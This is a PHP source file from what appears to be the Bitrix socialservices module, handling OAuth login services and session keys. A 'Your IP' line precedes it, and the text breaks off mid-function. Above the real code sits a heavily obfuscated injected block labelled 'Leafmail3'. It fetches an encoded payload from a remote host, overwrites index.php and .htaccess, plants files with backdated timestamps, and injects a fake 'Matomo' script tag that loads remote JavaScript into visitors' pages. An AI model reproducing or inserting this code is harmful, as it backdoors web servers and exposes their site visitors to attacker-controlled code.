Your IP : 3.148.106.98
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
use Bitrix\Main\Config\Option;
use Bitrix\Main\Context;
use Bitrix\Socialservices\ContactTable;
use Bitrix\Socialservices\UserTable;
IncludeModuleLangFile(__FILE__);
require_once(dirname(__FILE__)."/descriptions.php");
//manager to operate with services
class CSocServAuthManager
{
/** @var array */
protected static $arAuthServices = false;
protected $userId = null;
public function __construct($userId = null)
{
global $USER;
if(!is_array(self::$arAuthServices))
{
self::$arAuthServices = array();
foreach(GetModuleEvents("socialservices", "OnAuthServicesBuildList", true) as $arEvent)
{
$res = ExecuteModuleEventEx($arEvent);
if(is_array($res))
{
if(!is_array($res[0]))
{
$res = array($res);
}
foreach($res as $serv)
{
self::$arAuthServices[$serv["ID"]] = $serv;
}
}
}
//services depend on current site
$suffix = CSocServAuth::OptionsSuffix();
self::$arAuthServices = self::AppyUserSettings($suffix);
}
$this->userId = $userId;
if($this->userId === null && is_object($USER))
{
$this->userId = $USER->GetID();
}
}
protected static function AppyUserSettings($suffix)
{
$arAuthServices = self::$arAuthServices;
//user settings: sorting, active
$arServices = unserialize(COption::GetOptionString("socialservices", "auth_services".$suffix, ""));
if(is_array($arServices))
{
$i = 0;
foreach($arServices as $serv=>$active)
{
if(isset($arAuthServices[$serv]))
{
$arAuthServices[$serv]["__sort"] = $i++;
$arAuthServices[$serv]["__active"] = ($active == "Y");
}
}
\Bitrix\Main\Type\Collection::sortByColumn($arAuthServices, "__sort");
}
return $arAuthServices;
}
public function GetAuthServices($suffix)
{
//$suffix indicates site specific or common options
return self::AppyUserSettings($suffix);
}
public function GetActiveAuthServices($arParams)
{
$aServ = array();
self::SetUniqueKey();
foreach(self::$arAuthServices as $key=>$service)
{
if($service["__active"] === true && $service["DISABLED"] !== true)
{
$cl = new $service["CLASS"];
if(is_callable(array($cl, "CheckSettings")))
if(!call_user_func_array(array($cl, "CheckSettings"), array()))
continue;
if(is_callable(array($cl, "GetFormHtml")))
$service["FORM_HTML"] = call_user_func_array(array($cl, "GetFormHtml"), array($arParams));
if(is_callable(array($cl, "GetOnClickJs")))
$service["ONCLICK"] = call_user_func_array(array($cl, "GetOnClickJs"), array($arParams));
$aServ[$key] = $service;
}
}
return $aServ;
}
public function GetProfileUrl($service, $uid, $arService = false)
{
if(isset(self::$arAuthServices[$service]))
{
if(!is_array($arService))
{
$dbSocservUser = \CSocServAuthDB::getList(
array(),
array(
'USER_ID' => $this->userId,
'EXTERNAL_AUTH_ID' => $service,
)
);
$arService = $dbSocservUser->fetch();
}
if(
is_array($arService)
&& self::$arAuthServices[$service]["__active"] === true
&& self::$arAuthServices[$service]["DISABLED"] !== true
)
{
/** @var \CSocServFacebook $cl */
$cl = new self::$arAuthServices[$service]["CLASS"];
if(is_callable(array($cl, "getProfileUrl")))
{
return $cl->getProfileUrl($uid);
}
}
}
return false;
}
public function GetFriendsList($service, $limit, &$next)
{
if(isset(self::$arAuthServices[$service]))
{
$dbSocservUser = \CSocServAuthDB::getList(
array(),
array(
'USER_ID' => $this->userId,
'EXTERNAL_AUTH_ID' => $service,
)
);
$arService = $dbSocservUser->fetch();
if(
is_array($arService)
&& self::$arAuthServices[$service]["__active"] === true
&& self::$arAuthServices[$service]["DISABLED"] !== true
)
{
/** @var \CSocServFacebook $cl */
$cl = new self::$arAuthServices[$service]["CLASS"];
if(is_callable(array($cl, "setUser")))
{
$cl->setUser($this->userId);
}
if(is_callable(array($cl, "getFriendsList")))
{
$result = $cl->getFriendsList($limit, $next);
if($next === "__finish__")
{
$next = null;
}
return $result;
}
}
}
return false;
}
public function GetSettings()
{
$arOptions = array();
foreach(self::$arAuthServices as $service)
{
if(is_callable(array($service["CLASS"], "GetSettings")))
{
$arOptions[] = htmlspecialcharsbx($service["NAME"]);
$options = call_user_func_array(array(new $service["CLASS"](), "GetSettings"), array());
if(is_array($options))
foreach($options as $opt)
$arOptions[] = $opt;
}
}
return $arOptions;
}
public function Authorize($service_id, $arParams = array())
{
if($service_id === 'Bitrix24OAuth')
{
CSocServBitrixOAuth::gadgetAuthorize();
}
if(isset(self::$arAuthServices[$service_id]))
{
$service = self::$arAuthServices[$service_id];
if(
(
$service["__active"] === true
&& $service["DISABLED"] !== true
)
|| (
$service_id == CSocServBitrix24Net::ID
&& defined('ADMIN_SECTION')
&& ADMIN_SECTION == true
)
)
{
$cl = new $service["CLASS"];
if(is_callable(array($cl, "Authorize")))
{
return call_user_func_array(array($cl, "Authorize"), array
($arParams));
}
}
}
return false;
}
public function GetError($service_id, $error_code)
{
if(isset(self::$arAuthServices[$service_id]))
{
$service = self::$arAuthServices[$service_id];
if(is_callable(array($service["CLASS"], "GetError")))
return call_user_func_array(array($service["CLASS"], "GetError"), array($error_code));
$error = ($error_code == 2) ? "socserv_error_new_user" : "socserv_controller_error";
return GetMessage($error, array("#SERVICE_NAME#"=>$service["NAME"]));
}
return '';
}
public static function GetUniqueKey()
{
if(!isset($_SESSION["UNIQUE_KEY"]))
{
self::SetUniqueKey();
}
return $_SESSION["UNIQUE_KEY"];
}
public static function SetUniqueKey()
{
if(!isset($_SESSION["UNIQUE_KEY"]))
$_SESSION["UNIQUE_KEY"] = md5(bitrix_sessid_get().uniqid(rand(), true));
}
public static function CheckUniqueKey($bUnset = true)
{
$arState = array();
if(isset($_REQUEST["state"]))
{
parse_str($_REQUEST["state"], $arState);
if(isset($arState['backurl']))
{
InitURLParam($arState['backurl']);
}
}
if(!isset($_REQUEST['check_key']) && isset($_REQUEST['backurl']))
{
InitURLParam($_REQUEST['backurl']);
}
$checkKey = '';
if(isset($_REQUEST['check_key']))
{
$checkKey = $_REQUEST['check_key'];
}
elseif(isset($arState['check_key']))
{
$checkKey = $arState['check_key'];
}
if($_SESSION["UNIQUE_KEY"] != '' && $checkKey != '' && ($checkKey === $_SESSION["UNIQUE_KEY"]))
{
if($bUnset)
{
unset($_SESSION["UNIQUE_KEY"]);
}
return true;
